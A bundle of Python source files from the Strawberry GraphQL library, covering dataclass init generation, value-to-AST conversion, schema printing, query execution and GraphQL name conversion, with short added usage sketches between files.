from dataclasses import ( # type: ignore
_FIELD_INITVAR,
_HAS_DEFAULT_FACTORY,
_POST_INIT_NAME,
MISSING,
_create_fn,
_field_init,
_init_param,
)
from typing import Any
def dataclass_init_fn(fields, frozen, has_post_init, self_name, globals_) -> Any:
"""
We create a custom __init__ function for the dataclasses that back
Strawberry object types to only accept keyword arguments. This allows us to
avoid the problem where a type cannot define a field with a default value
before a field that doesn't have a default value.
An example of the problem:
https://stackoverflow.com/questions/51575931/class-inheritance-in-python-3-7-dataclasses
Code is adapted from:
https://github.com/python/cpython/blob/v3.9.6/Lib/dataclasses.py#L489-L536
Note: in Python 3.10 and above we use the `kw_only` argument to achieve the
same result.
"""
# fields contains both real fields and InitVar pseudo-fields.
locals_ = {f"_type_{f.name}": f.type for f in fields}
locals_.update(
{
"MISSING": MISSING,
"_HAS_DEFAULT_FACTORY": _HAS_DEFAULT_FACTORY,
}
)
body_lines = []
for f in fields:
line = _field_init(f, frozen, locals_, self_name)
        # A None line means that this field doesn't require
        # initialization (it's a pseudo-field). Just skip it.
if line:
body_lines.append(line)
# Does this class have a post-init function?
if has_post_init:
params_str = ",".join(f.name for f in fields if f._field_type is _FIELD_INITVAR)
body_lines.append(f"{self_name}.{_POST_INIT_NAME}({params_str})")
# If no body lines, use 'pass'.
if not body_lines:
body_lines = ["pass"]
_init_params = [_init_param(f) for f in fields if f.init]
if len(_init_params) > 0:
_init_params = ["*", *_init_params]
return _create_fn(
"__init__",
[self_name, *_init_params],
body_lines,
locals=locals_,
globals=globals_,
return_type=None,
    )


# ---- end of file: strawberry/ext/dataclasses/dataclasses.py (564bff00ff_strawberry_graphql-0.168.2) ----
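
# Illustrative sketch (added alongside this dump, not part of the original file):
# it reproduces the inheritance problem the docstring of dataclass_init_fn above
# refers to and shows the Python 3.10+ `kw_only` alternative it mentions. The
# class names `Node` and `NamedNode` are hypothetical.
from dataclasses import dataclass


@dataclass(kw_only=True)  # requires Python 3.10+
class Node:
    # A field with a default value in the base class...
    id: str = "unknown"


@dataclass(kw_only=True)
class NamedNode(Node):
    # ...followed by a subclass field without a default. Without kw_only (or the
    # keyword-only __init__ generated above) this ordering raises:
    # TypeError: non-default argument 'name' follows default argument
    name: str


node = NamedNode(name="example")  # every argument must be passed by keyword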
from __future__ import annotations
import dataclasses
import re
from math import isfinite
from typing import TYPE_CHECKING, Any, Mapping, Optional, cast
from graphql.language import (
BooleanValueNode,
EnumValueNode,
FloatValueNode,
IntValueNode,
ListValueNode,
NameNode,
NullValueNode,
ObjectFieldNode,
ObjectValueNode,
StringValueNode,
)
from graphql.pyutils import Undefined, inspect, is_iterable
from graphql.type import (
GraphQLID,
is_enum_type,
is_input_object_type,
is_leaf_type,
is_list_type,
is_non_null_type,
)
if TYPE_CHECKING:
from graphql.language import ValueNode
from graphql.type import (
GraphQLInputObjectType,
GraphQLInputType,
GraphQLList,
GraphQLNonNull,
)
__all__ = ["ast_from_value"]
_re_integer_string = re.compile("^-?(?:0|[1-9][0-9]*)$")
def ast_from_leaf_type(
serialized: object, type_: Optional[GraphQLInputType]
) -> ValueNode:
# Others serialize based on their corresponding Python scalar types.
if isinstance(serialized, bool):
return BooleanValueNode(value=serialized)
# Python ints and floats correspond nicely to Int and Float values.
if isinstance(serialized, int):
return IntValueNode(value=str(serialized))
if isinstance(serialized, float) and isfinite(serialized):
value = str(serialized)
if value.endswith(".0"):
value = value[:-2]
return FloatValueNode(value=value)
if isinstance(serialized, str):
# Enum types use Enum literals.
if type_ and is_enum_type(type_):
return EnumValueNode(value=serialized)
# ID types can use Int literals.
if type_ is GraphQLID and _re_integer_string.match(serialized):
return IntValueNode(value=serialized)
return StringValueNode(value=serialized)
if isinstance(serialized, dict):
return ObjectValueNode(
fields=[
ObjectFieldNode(
name=NameNode(value=key),
value=ast_from_leaf_type(value, None),
)
for key, value in serialized.items()
]
)
raise TypeError(
f"Cannot convert value to AST: {inspect(serialized)}."
) # pragma: no cover
def ast_from_value(value: Any, type_: GraphQLInputType) -> Optional[ValueNode]:
    # Custom ast_from_value that also allows serializing custom scalars that
    # aren't basic types, namely JSON scalar types.
if is_non_null_type(type_):
type_ = cast("GraphQLNonNull", type_)
ast_value = ast_from_value(value, type_.of_type)
if isinstance(ast_value, NullValueNode):
return None
return ast_value
# only explicit None, not Undefined or NaN
if value is None:
return NullValueNode()
# undefined
if value is Undefined:
return None
# Convert Python list to GraphQL list. If the GraphQLType is a list, but the value
# is not a list, convert the value using the list's item type.
if is_list_type(type_):
type_ = cast("GraphQLList", type_)
item_type = type_.of_type
if is_iterable(value):
maybe_value_nodes = (ast_from_value(item, item_type) for item in value)
value_nodes = tuple(node for node in maybe_value_nodes if node)
return ListValueNode(values=value_nodes)
return ast_from_value(value, item_type)
# Populate the fields of the input object by creating ASTs from each value in the
# Python dict according to the fields in the input type.
if is_input_object_type(type_):
# TODO: is this the right place?
if hasattr(value, "_type_definition"):
value = dataclasses.asdict(value)
if value is None or not isinstance(value, Mapping):
return None
type_ = cast("GraphQLInputObjectType", type_)
field_items = (
(field_name, ast_from_value(value[field_name], field.type))
for field_name, field in type_.fields.items()
if field_name in value
)
field_nodes = tuple(
ObjectFieldNode(name=NameNode(value=field_name), value=field_value)
for field_name, field_value in field_items
if field_value
)
return ObjectValueNode(fields=field_nodes)
if is_leaf_type(type_):
# Since value is an internally represented value, it must be serialized to an
# externally represented value before converting into an AST.
serialized = type_.serialize(value) # type: ignore
if serialized is None or serialized is Undefined:
return None # pragma: no cover
return ast_from_leaf_type(serialized, type_)
# Not reachable. All possible input types have been considered.
    raise TypeError(f"Unexpected input type: {inspect(type_)}.")  # pragma: no cover


# ---- end of file: strawberry/printer/ast_from_value.py (564bff00ff_strawberry_graphql-0.168.2) ----
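
# Minimal usage sketch (added): exercising the ast_from_value helper defined
# above with graphql-core's built-in scalars. The specific values are arbitrary.
from graphql import GraphQLBoolean, GraphQLString, print_ast

bool_node = ast_from_value(True, GraphQLBoolean)
print(print_ast(bool_node))  # -> true

string_node = ast_from_value("hello", GraphQLString)
print(print_ast(string_node))  # -> "hello"

null_node = ast_from_value(None, GraphQLString)
print(print_ast(null_node))  # -> null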
from __future__ import annotations
import dataclasses
from itertools import chain
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
cast,
overload,
)
from graphql import is_union_type
from graphql.language.printer import print_ast
from graphql.type import (
is_enum_type,
is_input_type,
is_interface_type,
is_object_type,
is_scalar_type,
is_specified_directive,
)
from graphql.utilities.print_schema import (
is_defined_type,
print_block,
print_deprecated,
print_description,
print_implemented_interfaces,
print_specified_by_url,
)
from graphql.utilities.print_schema import print_type as original_print_type
from strawberry.custom_scalar import ScalarWrapper
from strawberry.enum import EnumDefinition
from strawberry.schema_directive import Location, StrawberrySchemaDirective
from strawberry.type import StrawberryContainer
from strawberry.unset import UNSET
from .ast_from_value import ast_from_value
if TYPE_CHECKING:
from graphql import (
GraphQLArgument,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLScalarType,
GraphQLUnionType,
)
from graphql.type.directives import GraphQLDirective
from strawberry.field import StrawberryField
from strawberry.schema import BaseSchema
_T = TypeVar("_T")
@dataclasses.dataclass
class PrintExtras:
directives: Set[str] = dataclasses.field(default_factory=set)
types: Set[type] = dataclasses.field(default_factory=set)
@overload
def _serialize_dataclasses(value: Dict[_T, object]) -> Dict[_T, object]:
...
@overload
def _serialize_dataclasses(value: Union[List[object], Tuple[object]]) -> List[object]:
...
@overload
def _serialize_dataclasses(value: object) -> object:
...
def _serialize_dataclasses(value):
if dataclasses.is_dataclass(value):
return dataclasses.asdict(value)
if isinstance(value, (list, tuple)):
return [_serialize_dataclasses(v) for v in value]
if isinstance(value, dict):
return {k: _serialize_dataclasses(v) for k, v in value.items()}
return value
def print_schema_directive_params(
directive: GraphQLDirective, values: Dict[str, Any]
) -> str:
params = []
for name, arg in directive.args.items():
value = values.get(name, arg.default_value)
if value is UNSET:
value = None
else:
ast = ast_from_value(_serialize_dataclasses(value), arg.type)
value = ast and f"{name}: {print_ast(ast)}"
if value:
params.append(value)
if not params:
return ""
return "(" + ", ".join(params) + ")"
def print_schema_directive(
directive: Any, schema: BaseSchema, *, extras: PrintExtras
) -> str:
strawberry_directive = cast(
StrawberrySchemaDirective, directive.__class__.__strawberry_directive__
)
schema_converter = schema.schema_converter
gql_directive = schema_converter.from_schema_directive(directive.__class__)
params = print_schema_directive_params(
gql_directive,
{
schema.config.name_converter.get_graphql_name(f): getattr(
directive, f.python_name or f.name, UNSET
)
for f in strawberry_directive.fields
},
)
printed_directive = print_directive(gql_directive, schema=schema)
if printed_directive is not None:
extras.directives.add(printed_directive)
for field in strawberry_directive.fields:
f_type = field.type
while isinstance(f_type, StrawberryContainer):
f_type = f_type.of_type
if hasattr(f_type, "_type_definition"):
extras.types.add(cast(type, f_type))
if hasattr(f_type, "_scalar_definition"):
extras.types.add(cast(type, f_type))
if isinstance(f_type, EnumDefinition):
extras.types.add(cast(type, f_type))
return f" @{gql_directive.name}{params}"
def print_field_directives(
field: Optional[StrawberryField], schema: BaseSchema, *, extras: PrintExtras
) -> str:
if not field:
return ""
directives = (
directive
for directive in field.directives
if any(
location in [Location.FIELD_DEFINITION, Location.INPUT_FIELD_DEFINITION]
for location in directive.__strawberry_directive__.locations # type: ignore
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def print_argument_directives(
argument: GraphQLArgument, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = argument.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def print_args(
args: Dict[str, GraphQLArgument],
indentation: str = "",
*,
schema: BaseSchema,
extras: PrintExtras,
) -> str:
if not args:
return ""
    # If no argument has a description, print them all on one line.
if not any(arg.description for arg in args.values()):
return (
"("
+ ", ".join(
(
f"{print_input_value(name, arg)}"
f"{print_argument_directives(arg, schema=schema, extras=extras)}"
)
for name, arg in args.items()
)
+ ")"
)
return (
"(\n"
+ "\n".join(
print_description(arg, f" {indentation}", not i)
+ f" {indentation}"
+ print_input_value(name, arg)
+ print_argument_directives(arg, schema=schema, extras=extras)
for i, (name, arg) in enumerate(args.items())
)
+ f"\n{indentation})"
)
def print_fields(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
fields = []
for i, (name, field) in enumerate(type_.fields.items()):
strawberry_field = field.extensions and field.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
args = (
print_args(field.args, " ", schema=schema, extras=extras)
if hasattr(field, "args")
else ""
)
fields.append(
print_description(field, " ", not i)
+ f" {name}"
+ args
+ f": {field.type}"
+ print_field_directives(strawberry_field, schema=schema, extras=extras)
+ print_deprecated(field.deprecation_reason)
)
return print_block(fields)
def print_scalar(
type_: GraphQLScalarType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
# TODO: refactor this
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
return (
print_description(type_)
+ f"scalar {type_.name}"
+ print_specified_by_url(type_)
+ printed_directives
).strip()
def print_enum_value(
name: str,
value: GraphQLEnumValue,
first_in_block,
*,
schema: BaseSchema,
extras: PrintExtras,
) -> str:
strawberry_type = value.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
return (
print_description(value, " ", first_in_block)
+ f" {name}"
+ print_deprecated(value.deprecation_reason)
+ printed_directives
)
def print_enum(
type_: GraphQLEnumType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
values = [
print_enum_value(name, value, not i, schema=schema, extras=extras)
for i, (name, value) in enumerate(type_.values.items())
]
return (
print_description(type_)
+ f"enum {type_.name}"
+ printed_directives
+ print_block(values)
)
def print_extends(type_, schema: BaseSchema) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
strawberry_type = type_.extensions and type_.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
if strawberry_type and strawberry_type.extend:
return "extend "
return ""
def print_type_directives(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
strawberry_type = type_.extensions and type_.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
if not strawberry_type:
return ""
allowed_locations = (
[Location.INPUT_OBJECT] if strawberry_type.is_input else [Location.OBJECT]
)
directives = (
directive
for directive in strawberry_type.directives or []
if any(
location in allowed_locations
for location in directive.__strawberry_directive__.locations
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def _print_object(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
return (
print_description(type_)
+ print_extends(type_, schema)
+ f"type {type_.name}"
+ print_implemented_interfaces(type_)
+ print_type_directives(type_, schema, extras=extras)
+ print_fields(type_, schema, extras=extras)
)
def _print_interface(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
return (
print_description(type_)
+ print_extends(type_, schema)
+ f"interface {type_.name}"
+ print_implemented_interfaces(type_)
+ print_type_directives(type_, schema, extras=extras)
+ print_fields(type_, schema, extras=extras)
)
def print_input_value(name: str, arg: GraphQLArgument) -> str:
default_ast = ast_from_value(arg.default_value, arg.type)
arg_decl = f"{name}: {arg.type}"
if default_ast:
arg_decl += f" = {print_ast(default_ast)}"
return arg_decl + print_deprecated(arg.deprecation_reason)
def _print_input_object(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
fields = []
for i, (name, field) in enumerate(type_.fields.items()):
strawberry_field = field.extensions and field.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
fields.append(
print_description(field, " ", not i)
+ " "
+ print_input_value(name, field)
+ print_field_directives(strawberry_field, schema=schema, extras=extras)
)
return (
print_description(type_)
+ f"input {type_.name}"
+ print_type_directives(type_, schema, extras=extras)
+ print_block(fields)
)
def print_union(
type_: GraphQLUnionType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
types = type_.types
possible_types = " = " + " | ".join(t.name for t in types) if types else ""
return (
print_description(type_)
+ f"union {type_.name}{printed_directives}"
+ possible_types
)
def _print_type(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
# prevents us from trying to print a scalar as an input type
if is_scalar_type(type_):
return print_scalar(type_, schema=schema, extras=extras)
if is_enum_type(type_):
return print_enum(type_, schema=schema, extras=extras)
if is_object_type(type_):
return _print_object(type_, schema, extras=extras)
if is_input_type(type_):
return _print_input_object(type_, schema, extras=extras)
if is_interface_type(type_):
return _print_interface(type_, schema, extras=extras)
if is_union_type(type_):
return print_union(type_, schema=schema, extras=extras)
return original_print_type(type_)
def print_schema_directives(schema: BaseSchema, *, extras: PrintExtras) -> str:
directives = (
directive
for directive in schema.schema_directives
if any(
location in [Location.SCHEMA]
for location in directive.__strawberry_directive__.locations # type: ignore
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def _all_root_names_are_common_names(schema: BaseSchema) -> bool:
query = schema.query._type_definition
mutation = schema.mutation._type_definition if schema.mutation else None
subscription = schema.subscription._type_definition if schema.subscription else None
return (
query.name == "Query"
and (mutation is None or mutation.name == "Mutation")
and (subscription is None or subscription.name == "Subscription")
)
def print_schema_definition(
schema: BaseSchema, *, extras: PrintExtras
) -> Optional[str]:
# TODO: add support for description
if _all_root_names_are_common_names(schema) and not schema.schema_directives:
return None
query_type = schema.query._type_definition
operation_types = [f" query: {query_type.name}"]
if schema.mutation:
mutation_type = schema.mutation._type_definition
operation_types.append(f" mutation: {mutation_type.name}")
if schema.subscription:
subscription_type = schema.subscription._type_definition
operation_types.append(f" subscription: {subscription_type.name}")
directives = print_schema_directives(schema, extras=extras)
return f"schema{directives} {{\n" + "\n".join(operation_types) + "\n}"
def print_directive(
directive: GraphQLDirective, *, schema: BaseSchema
) -> Optional[str]:
strawberry_directive = directive.extensions["strawberry-definition"]
if (
isinstance(strawberry_directive, StrawberrySchemaDirective)
and not strawberry_directive.print_definition
):
return None
return (
print_description(directive)
+ f"directive @{directive.name}"
# TODO: add support for directives on arguments directives
+ print_args(directive.args, schema=schema, extras=PrintExtras())
+ (" repeatable" if directive.is_repeatable else "")
+ " on "
+ " | ".join(location.name for location in directive.locations)
)
def is_builtin_directive(directive: GraphQLDirective) -> bool:
    # This allows us to force-print a built-in directive when it has been
    # reimplemented using `schema_directive` (it then carries a strawberry
    # definition and is not filtered out as built-in).
if is_specified_directive(directive):
strawberry_definition = directive.extensions.get("strawberry-definition")
return strawberry_definition is None
return False
def print_schema(schema: BaseSchema) -> str:
graphql_core_schema = schema._schema # type: ignore
extras = PrintExtras()
directives = filter(
lambda n: not is_builtin_directive(n), graphql_core_schema.directives
)
type_map = graphql_core_schema.type_map
types = filter(is_defined_type, map(type_map.get, sorted(type_map)))
types_printed = [_print_type(type_, schema, extras=extras) for type_ in types]
schema_definition = print_schema_definition(schema, extras=extras)
directives = filter(
None, [print_directive(directive, schema=schema) for directive in directives]
)
def _name_getter(type_: Any):
if hasattr(type_, "name"):
return type_.name
if isinstance(type_, ScalarWrapper):
return type_._scalar_definition.name
return type_.__name__
return "\n\n".join(
chain(
sorted(extras.directives),
filter(None, [schema_definition]),
directives,
types_printed,
(
_print_type(
schema.schema_converter.from_type(type_), schema, extras=extras
)
                # Make sure extra types are ordered for predictable printing
for type_ in sorted(extras.types, key=_name_getter)
),
)
    )


# ---- end of file: strawberry/printer/printer.py (564bff00ff_strawberry_graphql-0.168.2) ----
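
# Hedged usage sketch (added): how the print_schema entry point above is usually
# reached. The Query type is hypothetical; strawberry is assumed to be installed.
import strawberry


@strawberry.type
class Query:
    hello: str = "world"


schema = strawberry.Schema(query=Query)

# Schema.as_str() (and str(schema)) delegate to print_schema(); all of them
# produce the SDL text, including any schema directives collected in PrintExtras.
print(print_schema(schema))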
from __future__ import annotations
from asyncio import ensure_future
from inspect import isawaitable
from typing import (
TYPE_CHECKING,
Awaitable,
Callable,
Iterable,
List,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
from graphql import GraphQLError, parse
from graphql import execute as original_execute
from graphql.validation import validate
from strawberry.exceptions import MissingQueryError
from strawberry.extensions.runner import SchemaExtensionsRunner
from strawberry.types import ExecutionResult
from .exceptions import InvalidOperationTypeError
if TYPE_CHECKING:
from graphql import ExecutionContext as GraphQLExecutionContext
from graphql import ExecutionResult as GraphQLExecutionResult
from graphql import GraphQLSchema
from graphql.language import DocumentNode
from graphql.validation import ASTValidationRule
from strawberry.extensions import SchemaExtension
from strawberry.types import ExecutionContext
from strawberry.types.graphql import OperationType
def parse_document(query: str) -> DocumentNode:
return parse(query)
def validate_document(
schema: GraphQLSchema,
document: DocumentNode,
validation_rules: Tuple[Type[ASTValidationRule], ...],
) -> List[GraphQLError]:
return validate(
schema,
document,
validation_rules,
)
def _run_validation(execution_context: ExecutionContext) -> None:
# Check if there are any validation rules or if validation has
# already been run by an extension
if len(execution_context.validation_rules) > 0 and execution_context.errors is None:
assert execution_context.graphql_document
execution_context.errors = validate_document(
execution_context.schema._schema,
execution_context.graphql_document,
execution_context.validation_rules,
)
async def execute(
schema: GraphQLSchema,
*,
allowed_operation_types: Iterable[OperationType],
extensions: Sequence[Union[Type[SchemaExtension], SchemaExtension]],
execution_context: ExecutionContext,
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
process_errors: Callable[[List[GraphQLError], Optional[ExecutionContext]], None],
) -> ExecutionResult:
extensions_runner = SchemaExtensionsRunner(
execution_context=execution_context,
extensions=list(extensions),
)
async with extensions_runner.operation():
# Note: In graphql-core the schema would be validated here but in
# Strawberry we are validating it at initialisation time instead
if not execution_context.query:
raise MissingQueryError()
async with extensions_runner.parsing():
try:
if not execution_context.graphql_document:
execution_context.graphql_document = parse_document(
execution_context.query
)
except GraphQLError as error:
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=await extensions_runner.get_extensions_results(),
)
except Exception as error: # pragma: no cover
error = GraphQLError(str(error), original_error=error)
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=await extensions_runner.get_extensions_results(),
)
if execution_context.operation_type not in allowed_operation_types:
raise InvalidOperationTypeError(execution_context.operation_type)
async with extensions_runner.validation():
_run_validation(execution_context)
if execution_context.errors:
process_errors(execution_context.errors, execution_context)
return ExecutionResult(data=None, errors=execution_context.errors)
async with extensions_runner.executing():
if not execution_context.result:
result = original_execute(
schema,
execution_context.graphql_document,
root_value=execution_context.root_value,
middleware=extensions_runner.as_middleware_manager(),
variable_values=execution_context.variables,
operation_name=execution_context.operation_name,
context_value=execution_context.context,
execution_context_class=execution_context_class,
)
if isawaitable(result):
result = await cast(Awaitable["GraphQLExecutionResult"], result)
result = cast("GraphQLExecutionResult", result)
execution_context.result = result
# Also set errors on the execution_context so that it's easier
# to access in extensions
if result.errors:
execution_context.errors = result.errors
# Run the `Schema.process_errors` function here before
# extensions have a chance to modify them (see the MaskErrors
# extension). That way we can log the original errors but
# only return a sanitised version to the client.
process_errors(result.errors, execution_context)
return ExecutionResult(
data=execution_context.result.data,
errors=execution_context.result.errors,
extensions=await extensions_runner.get_extensions_results(),
)
def execute_sync(
schema: GraphQLSchema,
*,
allowed_operation_types: Iterable[OperationType],
extensions: Sequence[Union[Type[SchemaExtension], SchemaExtension]],
execution_context: ExecutionContext,
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
process_errors: Callable[[List[GraphQLError], Optional[ExecutionContext]], None],
) -> ExecutionResult:
extensions_runner = SchemaExtensionsRunner(
execution_context=execution_context,
extensions=list(extensions),
)
with extensions_runner.operation():
# Note: In graphql-core the schema would be validated here but in
# Strawberry we are validating it at initialisation time instead
if not execution_context.query:
raise MissingQueryError()
with extensions_runner.parsing():
try:
if not execution_context.graphql_document:
execution_context.graphql_document = parse_document(
execution_context.query
)
except GraphQLError as error:
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=extensions_runner.get_extensions_results_sync(),
)
except Exception as error: # pragma: no cover
error = GraphQLError(str(error), original_error=error)
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=extensions_runner.get_extensions_results_sync(),
)
if execution_context.operation_type not in allowed_operation_types:
raise InvalidOperationTypeError(execution_context.operation_type)
with extensions_runner.validation():
_run_validation(execution_context)
if execution_context.errors:
process_errors(execution_context.errors, execution_context)
return ExecutionResult(data=None, errors=execution_context.errors)
with extensions_runner.executing():
if not execution_context.result:
result = original_execute(
schema,
execution_context.graphql_document,
root_value=execution_context.root_value,
middleware=extensions_runner.as_middleware_manager(),
variable_values=execution_context.variables,
operation_name=execution_context.operation_name,
context_value=execution_context.context,
execution_context_class=execution_context_class,
)
if isawaitable(result):
result = cast(Awaitable["GraphQLExecutionResult"], result)
ensure_future(result).cancel()
raise RuntimeError(
"GraphQL execution failed to complete synchronously."
)
result = cast("GraphQLExecutionResult", result)
execution_context.result = result
# Also set errors on the execution_context so that it's easier
# to access in extensions
if result.errors:
execution_context.errors = result.errors
# Run the `Schema.process_errors` function here before
# extensions have a chance to modify them (see the MaskErrors
# extension). That way we can log the original errors but
# only return a sanitised version to the client.
process_errors(result.errors, execution_context)
return ExecutionResult(
data=execution_context.result.data,
errors=execution_context.result.errors,
extensions=extensions_runner.get_extensions_results_sync(),
    )


# ---- end of file: strawberry/schema/execute.py (564bff00ff_strawberry_graphql-0.168.2) ----
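
# Hedged usage sketch (added): the execute()/execute_sync() helpers above are not
# usually called directly in application code; they are driven through
# strawberry.Schema. The Query type and query string below are arbitrary examples.
import strawberry


@strawberry.type
class Query:
    @strawberry.field
    def hello(self) -> str:
        return "world"


schema = strawberry.Schema(query=Query)

result = schema.execute_sync("{ hello }")
assert result.errors is None
assert result.data == {"hello": "world"}

# Passing no query at all raises MissingQueryError, and requesting an operation
# type that isn't in allowed_operation_types raises InvalidOperationTypeError,
# as handled in the functions above.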
from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional, Union, cast
from typing_extensions import Protocol
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
from strawberry.lazy_type import LazyType
from strawberry.schema_directive import StrawberrySchemaDirective
from strawberry.type import StrawberryList, StrawberryOptional
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from strawberry.utils.typing import eval_type
if TYPE_CHECKING:
from strawberry.arguments import StrawberryArgument
from strawberry.field import StrawberryField
from strawberry.type import StrawberryType
class HasGraphQLName(Protocol):
python_name: str
graphql_name: Optional[str]
class NameConverter:
def __init__(self, auto_camel_case: bool = True) -> None:
self.auto_camel_case = auto_camel_case
def apply_naming_config(self, name: str) -> str:
if self.auto_camel_case:
name = to_camel_case(name)
return name
def from_type(
self,
        type_: Union[StrawberryType, StrawberryDirective, StrawberrySchemaDirective],
) -> str:
if isinstance(type_, (StrawberryDirective, StrawberrySchemaDirective)):
return self.from_directive(type_)
if isinstance(type_, EnumDefinition): # TODO: Replace with StrawberryEnum
return self.from_enum(type_)
elif isinstance(type_, TypeDefinition):
if type_.is_input:
return self.from_input_object(type_)
if type_.is_interface:
return self.from_interface(type_)
return self.from_object(type_)
elif isinstance(type_, StrawberryUnion):
return self.from_union(type_)
elif isinstance(type_, ScalarDefinition): # TODO: Replace with StrawberryScalar
return self.from_scalar(type_)
else:
return str(type_)
def from_argument(self, argument: StrawberryArgument) -> str:
return self.get_graphql_name(argument)
def from_object(self, object_type: TypeDefinition) -> str:
if object_type.concrete_of:
return self.from_generic(
object_type, list(object_type.type_var_map.values())
)
return object_type.name
def from_input_object(self, input_type: TypeDefinition) -> str:
return self.from_object(input_type)
def from_interface(self, interface: TypeDefinition) -> str:
return self.from_object(interface)
def from_enum(self, enum: EnumDefinition) -> str:
return enum.name
def from_directive(
self, directive: Union[StrawberryDirective, StrawberrySchemaDirective]
) -> str:
name = self.get_graphql_name(directive)
if self.auto_camel_case:
# we don't want the first letter to be uppercase for directives
return name[0].lower() + name[1:]
return name
def from_scalar(self, scalar: ScalarDefinition) -> str:
return scalar.name
def from_field(self, field: StrawberryField) -> str:
return self.get_graphql_name(field)
def from_union(self, union: StrawberryUnion) -> str:
if union.graphql_name is not None:
return union.graphql_name
name = ""
for type_ in union.types:
if isinstance(type_, LazyType):
type_ = cast("StrawberryType", type_.resolve_type()) # noqa: PLW2901
if hasattr(type_, "_type_definition"):
type_name = self.from_type(type_._type_definition)
else:
# This should only be hit when generating names for type-related
# exceptions
type_name = self.from_type(type_)
name += type_name
return name
def from_generic(
self, generic_type: TypeDefinition, types: List[Union[StrawberryType, type]]
) -> str:
generic_type_name = generic_type.name
names: List[str] = []
for type_ in types:
name = self.get_from_type(type_)
names.append(name)
return "".join(names) + generic_type_name
def get_from_type(self, type_: Union[StrawberryType, type]) -> str:
type_ = eval_type(type_)
if isinstance(type_, LazyType):
name = type_.type_name
elif isinstance(type_, EnumDefinition):
name = type_.name
elif isinstance(type_, StrawberryUnion):
# TODO: test Generics with unnamed unions
assert type_.graphql_name
name = type_.graphql_name
elif isinstance(type_, StrawberryList):
name = self.get_from_type(type_.of_type) + "List"
elif isinstance(type_, StrawberryOptional):
name = self.get_from_type(type_.of_type) + "Optional"
elif hasattr(type_, "_scalar_definition"):
strawberry_type = type_._scalar_definition
name = strawberry_type.name
elif hasattr(type_, "_type_definition"):
strawberry_type = type_._type_definition
if (
strawberry_type.is_generic
and not strawberry_type.is_specialized_generic
):
types = type_.__args__
name = self.from_generic(strawberry_type, types)
elif (
strawberry_type.concrete_of
and not strawberry_type.is_specialized_generic
):
types = list(strawberry_type.type_var_map.values())
name = self.from_generic(strawberry_type, types)
else:
name = strawberry_type.name
else:
name = type_.__name__
return capitalize_first(name)
def get_graphql_name(self, obj: HasGraphQLName) -> str:
if obj.graphql_name is not None:
return obj.graphql_name
assert obj.python_name
        return self.apply_naming_config(obj.python_name)


# ---- end of file: strawberry/schema/name_converter.py (564bff00ff_strawberry_graphql-0.168.2) ----
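
# Hedged sketch (added) of the NameConverter behaviour above. SimpleField is a
# hypothetical stand-in that only provides the two attributes required by the
# HasGraphQLName protocol.
from dataclasses import dataclass
from typing import Optional


@dataclass
class SimpleField:
    python_name: str
    graphql_name: Optional[str] = None


converter = NameConverter(auto_camel_case=True)
print(converter.get_graphql_name(SimpleField("my_field_name")))        # myFieldName
print(converter.get_graphql_name(SimpleField("ignored", "explicit")))  # explicit

# With auto_camel_case disabled, python_name is used verbatim.
plain = NameConverter(auto_camel_case=False)
print(plain.get_graphql_name(SimpleField("my_field_name")))  # my_field_name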
from __future__ import annotations
from abc import abstractmethod
from functools import lru_cache
from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, Type, Union
from typing_extensions import Protocol
from strawberry.utils.logging import StrawberryLogger
if TYPE_CHECKING:
from graphql import GraphQLError
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
